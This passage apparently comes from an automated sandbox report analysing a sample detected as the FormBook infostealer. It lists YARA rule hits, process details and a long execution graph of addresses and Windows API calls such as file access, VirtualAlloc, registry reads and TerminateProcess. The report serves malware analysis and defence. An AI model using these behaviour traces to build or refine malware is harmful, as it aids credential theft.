                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      Target ID:6
                      Start time:01:15:26
                      Start date:02/07/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff79f9e0000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                        Execution Graph

                        Execution Coverage:4%
                        Dynamic/Decrypted Code Coverage:0.4%
                        Signature Coverage:2.6%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:54
8c5e3f 2 API calls 99386->99390 99800 8c9c9c 59 API calls 99387->99800 99388->99378 99388->99379 99797 8c5a1a CloseHandle 99388->99797 99392 8d219d 99390->99392 99393 906a11 99392->99393 99394 8d21b7 99392->99394 99396 8e0ff6 Mailbox 59 API calls 99393->99396 99395 8c77c7 59 API calls 99394->99395 99397 8d21bf 99395->99397 99398 906a17 99396->99398 99780 8c56d2 99397->99780 99400 906a2b 99398->99400 99801 8c59b0 ReadFile SetFilePointerEx 99398->99801 99405 906a2f _memmove 99400->99405 99802 92794e 59 API calls 2 library calls 99400->99802 99402 8d21ce 99402->99405 99795 8c9b9c 59 API calls Mailbox 99402->99795 99405->99405 99406 8d21e2 Mailbox 99407 8d221c 99406->99407 99408 8c5dcf CloseHandle 99406->99408 99407->99311 99409 8d2210 99408->99409 99409->99407 99796 8c5a1a CloseHandle 99409->99796 99412 8e0ff6 Mailbox 59 API calls 99411->99412 99413 8c5916 99412->99413 99414 8c5dcf CloseHandle 99413->99414 99415 8c5921 99414->99415 99416 8c77c7 59 API calls 99415->99416 99417 8c5929 99416->99417 99418 8c5dcf CloseHandle 99417->99418 99419 8c5930 99418->99419 99419->99311 99421 8c9997 84 API calls 99420->99421 99422 934787 99421->99422 99806 8c63a0 99422->99806 99424 934797 99425 9347bc 99424->99425 99831 8ca000 99424->99831 99427 8c9bf8 59 API calls 99425->99427 99428 9347c0 99425->99428 99427->99428 99428->99311 99430 8c77c7 59 API calls 99429->99430 99431 9423e0 99430->99431 99432 8c9997 84 API calls 99431->99432 99433 9423ef 99432->99433 99434 8c7b76 59 API calls 99433->99434 99435 942402 99434->99435 99436 8c9997 84 API calls 99435->99436 99437 94240f 99436->99437 99438 94249d 99437->99438 99439 942429 99437->99439 99440 8c9997 84 API calls 99438->99440 99898 8c9c9c 59 API calls 99439->99898 99442 9424a2 99440->99442 99444 9424b0 99442->99444 99445 9424ce 99442->99445 99443 94242e 99446 94248c 99443->99446 99448 942445 99443->99448 99447 8c9bf8 59 API calls 99444->99447 99449 9424e3 99445->99449 99899 8c9c9c 59 API calls 99445->99899 99450 8c9bf8 59 API calls 
99446->99450 99464 942499 Mailbox 99447->99464 99451 8c79ab 59 API calls 99448->99451 99453 9424f8 99449->99453 99900 8c9c9c 59 API calls 99449->99900 99450->99464 99455 942452 99451->99455 99454 8c80d7 59 API calls 99453->99454 99457 942512 99454->99457 99458 8c7c8e 59 API calls 99455->99458 99879 91f8f2 99457->99879 99460 942460 99458->99460 99461 8c79ab 59 API calls 99460->99461 99462 942479 99461->99462 99463 8c7c8e 59 API calls 99462->99463 99466 942487 99463->99466 99464->99311 99901 8c9b9c 59 API calls Mailbox 99466->99901 99467->99311 99468->99311 99469->99307 99902 916636 99470->99902 99472 916702 99472->99309 99474 8c99ab 99473->99474 99475 8c99b1 99473->99475 99491 8c5956 99474->99491 99476 8ff9fc __i64tow 99475->99476 99477 8c99f9 99475->99477 99479 8c99b7 __itow 99475->99479 99482 8ff903 99475->99482 99572 8e38d8 83 API calls 4 library calls 99477->99572 99481 8e0ff6 Mailbox 59 API calls 99479->99481 99483 8c99d1 99481->99483 99484 8e0ff6 Mailbox 59 API calls 99482->99484 99489 8ff97b Mailbox _wcscpy 99482->99489 99483->99474 99485 8c7f41 59 API calls 99483->99485 99487 8ff948 99484->99487 99485->99474 99486 8e0ff6 Mailbox 59 API calls 99488 8ff96e 99486->99488 99487->99486 99488->99489 99490 8c7f41 59 API calls 99488->99490 99573 8e38d8 83 API calls 4 library calls 99489->99573 99490->99489 99574 8c5dcf 99491->99574 99495 8c5981 99499 8c59a4 99495->99499 99586 8c5770 99495->99586 99497 8c5993 99603 8c53db SetFilePointerEx SetFilePointerEx 99497->99603 99499->99340 99499->99341 99500 8c599a 99500->99499 99501 8fe030 99500->99501 99604 923696 SetFilePointerEx SetFilePointerEx WriteFile 99501->99604 99503 8fe060 99503->99499 99504->99322 99506 8c77c7 59 API calls 99505->99506 99507 8c470f 99506->99507 99508 8c77c7 59 API calls 99507->99508 99509 8c4717 99508->99509 99510 8c77c7 59 API calls 99509->99510 99511 8c471f 99510->99511 99512 8c77c7 59 API calls 99511->99512 99513 8c4727 99512->99513 99514 8fd8fb 99513->99514 99515 8c475b 99513->99515 99516 
8c81a7 59 API calls 99514->99516 99517 8c79ab 59 API calls 99515->99517 99518 8fd904 99516->99518 99519 8c4769 99517->99519 99520 8c7eec 59 API calls 99518->99520 99521 8c7e8c 59 API calls 99519->99521 99523 8c479e 99520->99523 99522 8c4773 99521->99522 99522->99523 99524 8c79ab 59 API calls 99522->99524 99526 8c47bd 99523->99526 99540 8fd924 99523->99540 99542 8c47de 99523->99542 99527 8c4794 99524->99527 99633 8c7b52 99526->99633 99530 8c7e8c 59 API calls 99527->99530 99528 8c47ef 99532 8c4801 99528->99532 99636 8c81a7 99528->99636 99529 8fd9f4 99533 8c7d2c 59 API calls 99529->99533 99530->99523 99536 8c4811 99532->99536 99538 8c81a7 59 API calls 99532->99538 99551 8fd9b1 99533->99551 99541 8c4818 99536->99541 99543 8c81a7 59 API calls 99536->99543 99537 8c79ab 59 API calls 99537->99542 99538->99536 99539 8fd9dd 99539->99529 99546 8fd9c8 99539->99546 99540->99529 99540->99539 99550 8fd95b 99540->99550 99544 8c81a7 59 API calls 99541->99544 99553 8c481f Mailbox 99541->99553 99620 8c79ab 99542->99620 99543->99541 99544->99553 99545 8c7b52 59 API calls 99545->99551 99548 8c7d2c 59 API calls 99546->99548 99547 8fd9b9 99549 8c7d2c 59 API calls 99547->99549 99548->99551 99549->99551 99550->99547 99554 8fd9a4 99550->99554 99551->99542 99551->99545 99640 8c7a84 59 API calls 2 library calls 99551->99640 99553->99342 99555 8c7d2c 59 API calls 99554->99555 99555->99551 99557 8ff094 99556->99557 99558 8c7ca0 99556->99558 99651 918123 59 API calls _memmove 99557->99651 99645 8c7bb1 99558->99645 99561 8c7cac 99561->99350 99565 923e73 99561->99565 99562 8ff09e 99563 8c81a7 59 API calls 99562->99563 99564 8ff0a6 Mailbox 99563->99564 99652 924696 GetFileAttributesW 99565->99652 99568->99367 99569->99358 99570->99349 99571->99349 99572->99479 99573->99476 99575 8c5de8 99574->99575 99576 8c5962 99574->99576 99575->99576 99577 8c5ded CloseHandle 99575->99577 99578 8c5df9 99576->99578 99577->99576 99579 8fe181 99578->99579 99580 8c5e12 CreateFileW 99578->99580 99581 8c5e34 
99579->99581 99582 8fe187 CreateFileW 99579->99582 99580->99581 99581->99495 99582->99581 99583 8fe1ad 99582->99583 99605 8c5c4e 99583->99605 99587 8fdfce 99586->99587 99588 8c578b 99586->99588 99602 8c581a 99587->99602 99615 8c5e3f 99587->99615 99589 8c5c4e 2 API calls 99588->99589 99588->99602 99590 8c57ad 99589->99590 99591 8c538e 59 API calls 99590->99591 99593 8c57b7 99591->99593 99593->99587 99594 8c57c4 99593->99594 99595 8e0ff6 Mailbox 59 API calls 99594->99595 99596 8c57cf 99595->99596 99597 8c538e 59 API calls 99596->99597 99598 8c57da 99597->99598 99599 8c5d20 2 API calls 99598->99599 99600 8c5807 99599->99600 99601 8c5c4e 2 API calls 99600->99601 99601->99602 99602->99497 99603->99500 99604->99503 99612 8c5c68 99605->99612 99606 8c5cef SetFilePointerEx 99613 8c5dae SetFilePointerEx 99606->99613 99607 8fe151 99614 8c5dae SetFilePointerEx 99607->99614 99610 8c5cc3 99610->99581 99611 8fe16b 99612->99606 99612->99607 99612->99610 99613->99610 99614->99611 99616 8c5c4e 2 API calls 99615->99616 99617 8c5e60 99616->99617 99618 8c5c4e 2 API calls 99617->99618 99619 8c5e74 99618->99619 99619->99602 99621 8c79ba 99620->99621 99622 8c7a17 99620->99622 99621->99622 99623 8c79c5 99621->99623 99624 8c7e8c 59 API calls 99622->99624 99626 8c79e0 99623->99626 99627 8fef32 99623->99627 99625 8c79e8 _memmove 99624->99625 99625->99528 99629 8c8087 59 API calls 99626->99629 99628 8c8189 59 API calls 99627->99628 99630 8fef3c 99628->99630 99629->99625 99631 8e0ff6 Mailbox 59 API calls 99630->99631 99632 8fef5c 99631->99632 99634 8c7faf 59 API calls 99633->99634 99635 8c47c7 99634->99635 99635->99537 99635->99542 99637 8c81ba 99636->99637 99638 8c81b2 99636->99638 99637->99532 99641 8c80d7 99638->99641 99640->99551 99642 8c80fa _memmove 99641->99642 99643 8c80e7 99641->99643 99642->99637 99643->99642 99644 8e0ff6 Mailbox 59 API calls 99643->99644 99644->99642 99646 8c7bbf 99645->99646 99650 8c7be5 _memmove 99645->99650 99647 8e0ff6 Mailbox 59 API calls 99646->99647 
99646->99650 99648 8c7c34 99647->99648 99649 8e0ff6 Mailbox 59 API calls 99648->99649 99649->99650 99650->99561 99651->99562 99653 923e7a 99652->99653 99654 9246b1 FindFirstFileW 99652->99654 99653->99350 99653->99361 99654->99653 99655 9246c6 FindClose 99654->99655 99655->99653 99657 8c9997 84 API calls 99656->99657 99658 93ce2e 99657->99658 99661 93ce75 Mailbox 99658->99661 99694 93dab9 99658->99694 99660 93d242 99744 93dbdc 92 API calls Mailbox 99660->99744 99661->99370 99664 93cec6 Mailbox 99664->99661 99667 8c9997 84 API calls 99664->99667 99680 93d0cd 99664->99680 99726 92f835 59 API calls 2 library calls 99664->99726 99727 93d2f3 61 API calls 2 library calls 99664->99727 99665 93d251 99666 93d0db 99665->99666 99668 93d25d 99665->99668 99707 93cc82 99666->99707 99667->99664 99668->99661 99673 93d114 99722 8e0e48 99673->99722 99676 93d147 99729 8c942e 99676->99729 99677 93d12e 99728 92a0b5 89 API calls 4 library calls 99677->99728 99680->99660 99680->99666 99682 93d139 GetCurrentProcess TerminateProcess 99682->99676 99686 93d2b8 99686->99661 99690 93d2cc FreeLibrary 99686->99690 99687 93d17f 99741 93d95d 107 API calls _free 99687->99741 99690->99661 99692 93d190 99692->99686 99742 8c8ea0 59 API calls Mailbox 99692->99742 99743 8c9e9c 60 API calls Mailbox 99692->99743 99745 93d95d 107 API calls _free 99692->99745 99695 8c7faf 59 API calls 99694->99695 99696 93dad4 CharLowerBuffW 99695->99696 99746 91f658 99696->99746 99700 8c77c7 59 API calls 99701 93db0d 99700->99701 99702 8c79ab 59 API calls 99701->99702 99703 93db24 99702->99703 99704 8c7e8c 59 API calls 99703->99704 99705 93db30 Mailbox 99704->99705 99706 93db6c Mailbox 99705->99706 99753 93d2f3 61 API calls 2 library calls 99705->99753 99706->99664 99708 93cc9d 99707->99708 99712 93ccf2 99707->99712 99709 8e0ff6 Mailbox 59 API calls 99708->99709 99711 93ccbf 99709->99711 99710 8e0ff6 Mailbox 59 API calls 99710->99711 99711->99710 99711->99712 99713 93dd64 99712->99713 99714 93df8d Mailbox 99713->99714 
99715 93dd87 _strcat _wcscpy __wsetenvp 99713->99715 99714->99673 99715->99714 99716 8c9c9c 59 API calls 99715->99716 99717 8c9cf8 59 API calls 99715->99717 99718 8c9d46 59 API calls 99715->99718 99719 8c9997 84 API calls 99715->99719 99720 8e594c 58 API calls __crtCompareStringA_stat 99715->99720 99756 925b29 61 API calls 2 library calls 99715->99756 99716->99715 99717->99715 99718->99715 99719->99715 99720->99715 99723 8e0e5d 99722->99723 99724 8e0ef5 VirtualAlloc 99723->99724 99725 8e0ec3 99723->99725 99724->99725 99725->99676 99725->99677 99726->99664 99727->99664 99728->99682 99730 8c9436 99729->99730 99731 8e0ff6 Mailbox 59 API calls 99730->99731 99732 8c9444 99731->99732 99733 8c9450 99732->99733 99757 8c935c 59 API calls Mailbox 99732->99757 99735 8c91b0 99733->99735 99758 8c92c0 99735->99758 99737 8e0ff6 Mailbox 59 API calls 99738 8c925b 99737->99738 99738->99692 99740 8c8ea0 59 API calls Mailbox 99738->99740 99739 8c91bf 99739->99737 99739->99738 99740->99687 99741->99692 99742->99692 99743->99692 99744->99665 99745->99692 99748 91f683 __wsetenvp 99746->99748 99747 91f6c2 99747->99700 99747->99705 99748->99747 99749 91f769 99748->99749 99752 91f6b8 99748->99752 99749->99747 99755 8c7a24 61 API calls 99749->99755 99752->99747 99754 8c7a24 61 API calls 99752->99754 99753->99706 99754->99752 99755->99749 99756->99715 99757->99733 99759 8c92c9 Mailbox 99758->99759 99760 8ff5c8 99759->99760 99765 8c92d3 99759->99765 99761 8e0ff6 Mailbox 59 API calls 99760->99761 99763 8ff5d4 99761->99763 99762 8c92da 99762->99739 99763->99763 99765->99762 99766 8c9df0 59 API calls Mailbox 99765->99766 99766->99765 99768 8ffbff 99767->99768 99769 8c9c08 99767->99769 99770 8ffc10 99768->99770 99772 8c7d2c 59 API calls 99768->99772 99774 8e0ff6 Mailbox 59 API calls 99769->99774 99771 8c7eec 59 API calls 99770->99771 99773 8ffc1a 99771->99773 99772->99770 99777 8c9c34 99773->99777 99778 8c77c7 59 API calls 99773->99778 99775 8c9c1b 99774->99775 99775->99773 99776 8c9c26 
99775->99776 99776->99777 99779 8c7f41 59 API calls 99776->99779 99777->99374 99777->99379 99778->99777 99779->99777 99781 8c56dd 99780->99781 99782 8c5702 99780->99782 99781->99782 99786 8c56ec 99781->99786 99783 8c7eec 59 API calls 99782->99783 99784 92349a 99783->99784 99788 9234c9 99784->99788 99803 923436 ReadFile SetFilePointerEx 99784->99803 99804 8c7a84 59 API calls 2 library calls 99784->99804 99787 8c5c18 59 API calls 99786->99787 99789 9235ba 99787->99789 99788->99402 99791 8c5632 61 API calls 99789->99791 99792 9235c8 99791->99792 99794 9235d8 Mailbox 99792->99794 99805 8c793a 61 API calls Mailbox 99792->99805 99794->99402 99795->99406 99796->99407 99797->99379 99798->99379 99799->99384 99800->99392 99801->99400 99802->99405 99803->99784 99804->99784 99805->99794 99854 8c7b76 99806->99854 99808 8c65ca 99861 8c766f 99808->99861 99810 8c65e4 Mailbox 99810->99424 99813 8c7eec 59 API calls 99827 8c63c5 99813->99827 99814 8fe41f 99871 91fdba 91 API calls 4 library calls 99814->99871 99815 8c766f 59 API calls 99815->99827 99819 8fe42d 99820 8c766f 59 API calls 99819->99820 99821 8fe443 99820->99821 99821->99810 99822 8c68f9 _memmove 99872 91fdba 91 API calls 4 library calls 99822->99872 99823 8fe3bb 99824 8c8189 59 API calls 99823->99824 99826 8fe3c6 99824->99826 99830 8e0ff6 Mailbox 59 API calls 99826->99830 99827->99808 99827->99813 99827->99814 99827->99815 99827->99822 99827->99823 99828 8c7faf 59 API calls 99827->99828 99859 8c60cc 60 API calls 99827->99859 99860 8c5ea1 59 API calls Mailbox 99827->99860 99869 8c5fd2 60 API calls 99827->99869 99870 8c7a84 59 API calls 2 library calls 99827->99870 99829 8c659b CharUpperBuffW 99828->99829 99829->99827 99830->99822 99832 8ca01f 99831->99832 99849 8ca04d Mailbox 99831->99849 99833 8e0ff6 Mailbox 59 API calls 99832->99833 99833->99849 99834 8e2f80 67 API calls __cinit 99834->99849 99835 8cb5d5 99836 8c81a7 59 API calls 99835->99836 99848 8ca1b7 99836->99848 99837 917405 59 API calls 99837->99849 99840 8e0ff6 
59 API calls Mailbox 99840->99849 99841 8c81a7 59 API calls 99841->99849 99843 90047f 99875 92a0b5 89 API calls 4 library calls 99843->99875 99845 8c77c7 59 API calls 99845->99849 99847 90048e 99847->99425 99848->99425 99849->99834 99849->99835 99849->99837 99849->99840 99849->99841 99849->99843 99849->99845 99849->99848 99850 900e00 99849->99850 99852 8cb5da 99849->99852 99853 8ca6ba 99849->99853 99873 8cca20 341 API calls 2 library calls 99849->99873 99874 8cba60 60 API calls Mailbox 99849->99874 99877 92a0b5 89 API calls 4 library calls 99850->99877 99878 92a0b5 89 API calls 4 library calls 99852->99878 99876 92a0b5 89 API calls 4 library calls 99853->99876 99855 8e0ff6 Mailbox 59 API calls 99854->99855 99856 8c7b9b 99855->99856 99857 8c8189 59 API calls 99856->99857 99858 8c7baa 99857->99858 99858->99827 99859->99827 99860->99827 99862 8c770f 99861->99862 99866 8c7682 _memmove 99861->99866 99864 8e0ff6 Mailbox 59 API calls 99862->99864 99863 8e0ff6 Mailbox 59 API calls 99865 8c7689 99863->99865 99864->99866 99867 8e0ff6 Mailbox 59 API calls 99865->99867 99868 8c76b2 99865->99868 99866->99863 99867->99868 99868->99810 99869->99827 99870->99827 99871->99819 99872->99810 99873->99849 99874->99849 99875->99847 99876->99848 99877->99852 99878->99848 99880 8c77c7 59 API calls 99879->99880 99881 91f905 99880->99881 99882 8c7b76 59 API calls 99881->99882 99883 91f919 99882->99883 99884 91f658 61 API calls 99883->99884 99895 91f93b 99883->99895 99886 91f935 99884->99886 99885 91f658 61 API calls 99885->99895 99887 8c79ab 59 API calls 99886->99887 99886->99895 99887->99895 99888 91f9b5 99890 8c79ab 59 API calls 99888->99890 99889 8c79ab 59 API calls 99889->99895 99891 91f9ce 99890->99891 99892 8c7c8e 59 API calls 99891->99892 99893 91f9da 99892->99893 99896 8c80d7 59 API calls 99893->99896 99897 91f9e9 Mailbox 99893->99897 99894 8c7c8e 59 API calls 99894->99895 99895->99885 99895->99888 99895->99889 99895->99894 99896->99897 99897->99466 99898->99443 99899->99449 
99900->99453 99901->99464 99903 916641 99902->99903 99904 91665e 99902->99904 99903->99904 99906 916621 59 API calls Mailbox 99903->99906 99904->99472 99906->99903 99907 8ce70b 99910 8cd260 99907->99910 99909 8ce719 99911 8cd27d 99910->99911 99938 8cd4dd 99910->99938 99912 902b0a 99911->99912 99913 902abb 99911->99913 99937 8cd2a4 99911->99937 99958 93a6fb 341 API calls __cinit 99912->99958 99916 902abe 99913->99916 99924 902ad9 99913->99924 99917 902aca 99916->99917 99916->99937 99956 93ad0f 341 API calls 99917->99956 99918 8e2f80 __cinit 67 API calls 99918->99937 99921 902cdf 99921->99921 99922 8cd6ab 99922->99909 99923 8cd594 99950 8c8bb2 68 API calls 99923->99950 99924->99938 99957 93b1b7 341 API calls 3 library calls 99924->99957 99928 8cd5a3 99928->99909 99929 902c26 99962 93aa66 89 API calls 99929->99962 99937->99918 99937->99922 99937->99923 99937->99929 99937->99938 99941 8ca000 341 API calls 99937->99941 99942 8c81a7 59 API calls 99937->99942 99944 8c88a0 68 API calls __cinit 99937->99944 99945 8c86a2 68 API calls 99937->99945 99946 8c8620 99937->99946 99951 8c859a 68 API calls 99937->99951 99952 8cd0dc 341 API calls 99937->99952 99953 8c9f3a 59 API calls Mailbox 99937->99953 99954 8cd060 89 API calls 99937->99954 99955 8ccedd 341 API calls 99937->99955 99959 8c8bb2 68 API calls 99937->99959 99960 8c9e9c 60 API calls Mailbox 99937->99960 99961 916d03 60 API calls 99937->99961 99938->99922 99963 92a0b5 89 API calls 4 library calls 99938->99963 99941->99937 99942->99937 99944->99937 99945->99937 99947 8c862b 99946->99947 99949 8c8652 99947->99949 99964 8c8b13 69 API calls Mailbox 99947->99964 99949->99937 99950->99928 99951->99937 99952->99937 99953->99937 99954->99937 99955->99937 99956->99922 99957->99938 99958->99937 99959->99937 99960->99937 99961->99937 99962->99938 99963->99921 99964->99949 99965 e823b0 99979 e80000 99965->99979 99967 e8244a 99982 e822a0 99967->99982 99985 e83470 GetPEB 99979->99985 99981 e8068b 99981->99967 99983 e822a9 Sleep 
99982->99983 99984 e822b7 99983->99984 99986 e8349a 99985->99986 99986->99981 99987 8c1055 99992 8c2649 99987->99992 99990 8e2f80 __cinit 67 API calls 99991 8c1064 99990->99991 99993 8c77c7 59 API calls 99992->99993 99994 8c26b7 99993->99994 99999 8c3582 99994->99999 99996 8c2754 99998 8c105a 99996->99998 100002 8c3416 59 API calls 2 library calls 99996->100002 99998->99990 100003 8c35b0 99999->100003 100002->99996 100004 8c35bd 100003->100004 100005 8c35a1 100003->100005 100004->100005 100006 8c35c4 RegOpenKeyExW 100004->100006 100005->99996 100006->100005 100007 8c35de RegQueryValueExW 100006->100007 100008 8c35ff 100007->100008 100009 8c3614 RegCloseKey 100007->100009 100008->100009 100009->100005 100010 8fff06 100011 8fff10 100010->100011 100047 8cac90 Mailbox _memmove 100010->100047 100151 8c8e34 59 API calls Mailbox 100011->100151 100016 8cb5d5 100021 8c81a7 59 API calls 100016->100021 100019 8e0ff6 59 API calls Mailbox 100033 8ca097 Mailbox 100019->100033 100031 8ca1b7 100021->100031 100022 90047f 100155 92a0b5 89 API calls 4 library calls 100022->100155 100023 8cb5da 100161 92a0b5 89 API calls 4 library calls 100023->100161 100024 8c7f41 59 API calls 100024->100047 100025 8c81a7 59 API calls 100025->100033 100028 8c77c7 59 API calls 100028->100033 100029 90048e 100030 8e2f80 67 API calls __cinit 100030->100033 100032 917405 59 API calls 100032->100033 100033->100016 100033->100019 100033->100022 100033->100023 100033->100025 100033->100028 100033->100030 100033->100031 100033->100032 100036 900e00 100033->100036 100039 8ca6ba 100033->100039 100145 8cca20 341 API calls 2 library calls 100033->100145 100146 8cba60 60 API calls Mailbox 100033->100146 100035 9166f4 Mailbox 59 API calls 100035->100031 100160 92a0b5 89 API calls 4 library calls 100036->100160 100159 92a0b5 89 API calls 4 library calls 100039->100159 100040 9166f4 Mailbox 59 API calls 100040->100047 100041 8e0ff6 59 API calls Mailbox 100041->100047 100042 8cb416 100150 8cf803 341 API calls 
100042->100150 100044 8ca000 341 API calls 100044->100047 100045 900c94 100157 8c9df0 59 API calls Mailbox 100045->100157 100047->100024 100047->100031 100047->100033 100047->100040 100047->100041 100047->100042 100047->100044 100047->100045 100048 900ca2 100047->100048 100051 8cb37c 100047->100051 100056 8cb685 100047->100056 100059 8cade2 Mailbox 100047->100059 100067 93c5f4 100047->100067 100099 927be0 100047->100099 100105 93bf80 100047->100105 100152 917405 59 API calls 100047->100152 100153 93c4a7 85 API calls 2 library calls 100047->100153 100158 92a0b5 89 API calls 4 library calls 100048->100158 100050 900c86 100050->100031 100050->100035 100148 8c9e9c 60 API calls Mailbox 100051->100148 100053 8cb38d 100149 8c9e9c 60 API calls Mailbox 100053->100149 100156 92a0b5 89 API calls 4 library calls 100056->100156 100059->100031 100059->100050 100059->100056 100060 9000e0 VariantClear 100059->100060 100061 92d2e6 101 API calls 100059->100061 100062 93e237 130 API calls 100059->100062 100063 8c5906 60 API calls 100059->100063 100064 9423c9 87 API calls 100059->100064 100065 8d2123 95 API calls 100059->100065 100066 93474d 341 API calls 100059->100066 100147 8c9df0 59 API calls Mailbox 100059->100147 100154 917405 59 API calls 100059->100154 100060->100059 100061->100059 100062->100059 100063->100059 100064->100059 100065->100059 100066->100059 100068 8c77c7 59 API calls 100067->100068 100069 93c608 100068->100069 100070 8c77c7 59 API calls 100069->100070 100071 93c610 100070->100071 100072 8c77c7 59 API calls 100071->100072 100073 93c618 100072->100073 100074 8c9997 84 API calls 100073->100074 100085 93c626 100074->100085 100075 8c7d2c 59 API calls 100075->100085 100076 93c83c Mailbox 100076->100047 100078 93c7f6 100079 8c7e0b 59 API calls 100078->100079 100083 93c803 100079->100083 100080 8c7a84 59 API calls 100080->100085 100081 93c811 100084 8c7e0b 59 API calls 100081->100084 100082 8c81a7 59 API calls 100082->100085 100087 8c7c8e 59 API calls 100083->100087 
100088 93c820 100084->100088 100085->100075 100085->100076 100085->100078 100085->100080 100085->100081 100085->100082 100086 8c7faf 59 API calls 100085->100086 100090 93c80f 100085->100090 100092 8c7faf 59 API calls 100085->100092 100096 8c9997 84 API calls 100085->100096 100097 8c7c8e 59 API calls 100085->100097 100098 8c7e0b 59 API calls 100085->100098 100089 93c6bd CharUpperBuffW 100086->100089 100087->100090 100091 8c7c8e 59 API calls 100088->100091 100162 8c859a 68 API calls 100089->100162 100090->100076 100164 8c9b9c 59 API calls Mailbox 100090->100164 100091->100090 100094 93c77d CharUpperBuffW 100092->100094 100163 8cc707 69 API calls 2 library calls 100094->100163 100096->100085 100097->100085 100098->100085 100100 927bec 100099->100100 100101 8e0ff6 Mailbox 59 API calls 100100->100101 100102 927bfa 100101->100102 100103 8c77c7 59 API calls 100102->100103 100104 927c08 100102->100104 100103->100104 100104->100047 100106 93bfc5 100105->100106 100107 93bfab 100105->100107 100166 93a528 59 API calls Mailbox 100106->100166 100165 92a0b5 89 API calls 4 library calls 100107->100165 100110 93bfd0 100111 8ca000 340 API calls 100110->100111 100112 93c031 100111->100112 100113 93c0c3 100112->100113 100114 93c072 100112->100114 100138 93bfbd Mailbox 100112->100138 100115 93c119 100113->100115 100116 93c0c9 100113->100116 100167 927581 59 API calls Mailbox 100114->100167 100117 8c9997 84 API calls 100115->100117 100115->100138 100187 927ba4 59 API calls 100116->100187 100118 93c12b 100117->100118 100120 8c7faf 59 API calls 100118->100120 100124 93c14f CharUpperBuffW 100120->100124 100121 93c0ec 100188 8c5ea1 59 API calls Mailbox 100121->100188 100123 93c0a2 100168 8cf5c0 100123->100168 100128 93c169 100124->100128 100127 93c0f4 Mailbox 100189 8cfe40 341 API calls 2 library calls 100127->100189 100129 93c170 100128->100129 100130 93c1bc 100128->100130 100190 927581 59 API calls Mailbox 100129->100190 100131 8c9997 84 API calls 100130->100131 100133 93c1c4 
100131->100133 100191 8c9fbd 60 API calls 100133->100191 100136 93c19e 100137 8cf5c0 340 API calls 100136->100137 100137->100138 100138->100047 100139 93c1ce 100139->100138 100140 8c9997 84 API calls 100139->100140 100141 93c1e9 100140->100141 100192 8c5ea1 59 API calls Mailbox 100141->100192 100143 93c1f9 100193 8cfe40 341 API calls 2 library calls 100143->100193 100145->100033 100146->100033 100147->100059 100148->100053 100149->100042 100150->100056 100151->100047 100152->100047 100153->100047 100154->100059 100155->100029 100156->100050 100157->100050 100158->100050 100159->100031 100160->100023 100161->100031 100162->100085 100163->100085 100164->100076 100165->100138 100166->100110 100167->100123 100169 8cf61a 100168->100169 100170 8cf7b0 100168->100170 100171 904848 100169->100171 100172 8cf626 100169->100172 100173 8c7f41 59 API calls 100170->100173 100174 93bf80 341 API calls 100171->100174 100283 8cf3f0 341 API calls 2 library calls 100172->100283 100180 8cf6ec Mailbox 100173->100180 100176 904856 100174->100176 100177 8cf790 100176->100177 100285 92a0b5 89 API calls 4 library calls 100176->100285 100177->100138 100178 8cf65d 100178->100176 100178->100177 100178->100180 100182 8cf743 100180->100182 100183 923e73 3 API calls 100180->100183 100194 92cde5 100180->100194 100274 8c4faa 100180->100274 100280 93e24b 100180->100280 100182->100177 100284 8c9df0 59 API calls Mailbox 100182->100284 100183->100182 100187->100121 100188->100127 100189->100138 100190->100136 100191->100139 100192->100143 100193->100138 100195 8c77c7 59 API calls 100194->100195 100196 92ce1a 100195->100196 100197 8c77c7 59 API calls 100196->100197 100198 92ce23 100197->100198 100199 92ce37 100198->100199 100419 8c9c9c 59 API calls 100198->100419 100201 8c9997 84 API calls 100199->100201 100202 92ce54 100201->100202 100203 92ce76 100202->100203 100204 92cf55 100202->100204 100273 92cf85 Mailbox 100202->100273 100205 8c9997 84 API calls 100203->100205 100286 8c4f3d 100204->100286 100207 
92ce82 100205->100207 100210 8c81a7 59 API calls 100207->100210 100209 92cf81 100212 8c77c7 59 API calls 100209->100212 100209->100273 100213 92ce8e 100210->100213 100211 8c4f3d 136 API calls 100211->100209 100214 92cfb6 100212->100214 100216 92cea2 100213->100216 100217 92ced4 100213->100217 100215 8c77c7 59 API calls 100214->100215 100218 92cfbf 100215->100218 100219 8c81a7 59 API calls 100216->100219 100220 8c9997 84 API calls 100217->100220 100221 8c77c7 59 API calls 100218->100221 100222 92ceb2 100219->100222 100223 92cee1 100220->100223 100224 92cfc8 100221->100224 100225 8c7e0b 59 API calls 100222->100225 100226 8c81a7 59 API calls 100223->100226 100227 8c77c7 59 API calls 100224->100227 100229 92cebc 100225->100229 100230 92ceed 100226->100230 100228 92cfd1 100227->100228 100231 8c9997 84 API calls 100228->100231 100232 8c9997 84 API calls 100229->100232 100420 924cd3 GetFileAttributesW 100230->100420 100235 92cfde 100231->100235 100236 92cec8 100232->100236 100234 92cef6 100237 92cf09 100234->100237 100240 8c7b52 59 API calls 100234->100240 100238 8c46f9 59 API calls 100235->100238 100239 8c7c8e 59 API calls 100236->100239 100242 8c9997 84 API calls 100237->100242 100248 92cf0f 100237->100248 100241 92cff9 100238->100241 100239->100217 100240->100237 100243 8c7b52 59 API calls 100241->100243 100244 92cf36 100242->100244 100245 92d008 100243->100245 100421 923a2b 75 API calls Mailbox 100244->100421 100247 92d03c 100245->100247 100249 8c7b52 59 API calls 100245->100249 100250 8c81a7 59 API calls 100247->100250 100248->100273 100252 92d019 100249->100252 100251 92d04a 100250->100251 100253 8c7c8e 59 API calls 100251->100253 100252->100247 100255 8c7d2c 59 API calls 100252->100255 100254 92d058 100253->100254 100256 8c7c8e 59 API calls 100254->100256 100257 92d02e 100255->100257 100258 92d066 100256->100258 100259 8c7d2c 59 API calls 100257->100259 100260 8c7c8e 59 API calls 100258->100260 100259->100247 100261 92d074 100260->100261 100262 8c9997 